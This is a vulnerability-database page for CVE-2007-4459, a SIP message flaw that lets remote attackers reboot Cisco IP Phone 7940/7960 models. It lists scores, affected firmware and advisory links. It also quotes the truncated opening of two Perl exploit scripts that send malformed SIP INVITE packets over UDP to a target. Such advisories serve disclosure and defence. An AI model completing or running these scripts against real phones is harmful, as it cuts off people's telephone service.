Published: 21/08/2007 Updated: 29/07/2017

CVSS v2 Base Score: 7.1 | Impact Score: 6.9 | Exploitability Score: 8.6

VMScore: 720

Vector: AV:N/AC:M/Au:N/C:N/I:N/A:C

Cisco IP Phone 7940 and 7960 with P0S3-08-6-00 firmware, and other SIP firmware prior to 8.7(0), allows remote malicious users to cause a denial of service (device reboot) via (1) a certain sequence of 10 invalid SIP INVITE and OPTIONS messages; or (2) a certain invalid SIP INVITE message that contains a remote tag, followed by a certain set of two related SIP OPTIONS messages.

Vulnerable Product	Search on Vulmon	Subscribe to Product
cisco voip phone cp-7960
cisco voip phone cp-7940 8.6
cisco voip phone cp-7940
cisco voip phone cp-7940 3.0
cisco voip phone cp-7940 3.1
cisco voip phone cp-7940 3.2

#!/usr/bin/perl use IO::Socket::INET; die "Usage $0 <dst> <port> <username>" unless ($ARGV[2]); $socket=new IO::Socket::INET->new(PeerPort=>$ARGV[1], Proto=>'udp', PeerAddr=>$ARGV[0]); $msg = "INVITE sip:$ARGV[2]\@$ARGV[0] SIP/20\r\nVia: SIP/20/UDP\t19216812;rport;branch=00\r\nFrom: < ...

#!/usr/bin/perl use IO::Socket::INET; die "Usage $0 <dst-address> <dst-port> <dst_username> <src-address>" unless ($ARGV[3]); $socket=new IO::Socket::INET->new(PeerPort=>$ARGV[1], Proto=>'udp', PeerAddr=>$ARGV[0]); $msg = "INVITE sip:$ARGV[2]\@$ARGV[0] SIP/20\r\nVia: SIP/20/UDP $A ...

CWE-20 http://lists.grok.org.uk/pipermail/full-disclosure/2007-August/065401.html http://lists.grok.org.uk/pipermail/full-disclosure/2007-August/065402.html http://www.securityfocus.com/bid/25378 http://secunia.com/advisories/26547 http://www.cisco.com/warp/public/707/cisco-sr-20070821-sip.shtml http://www.osvdb.org/36695 http://securitytracker.com/id?1018591 http://securityreason.com/securityalert/3042 http://www.vupen.com/english/advisories/2007/2928 https://exchange.xforce.ibmcloud.com/vulnerabilities/36125 https://nvd.nist.gov https://www.exploit-db.com/exploits/4297/

Get Started

Vulmon Search is a vulnerability search engine. It gives comprehensive vulnerability information through a very simple user interface.

Home Recent Vulnerabilities Research Posts Trends Blog About Contact

Vulmon Search Vulmon Research Vulmon Alerts Vulmap

Twitter Reddit Linkedin Facebook

CVE-2007-4459

Vulnerability Summary

Exploits

References

Vulmon Search

About

Products

Connect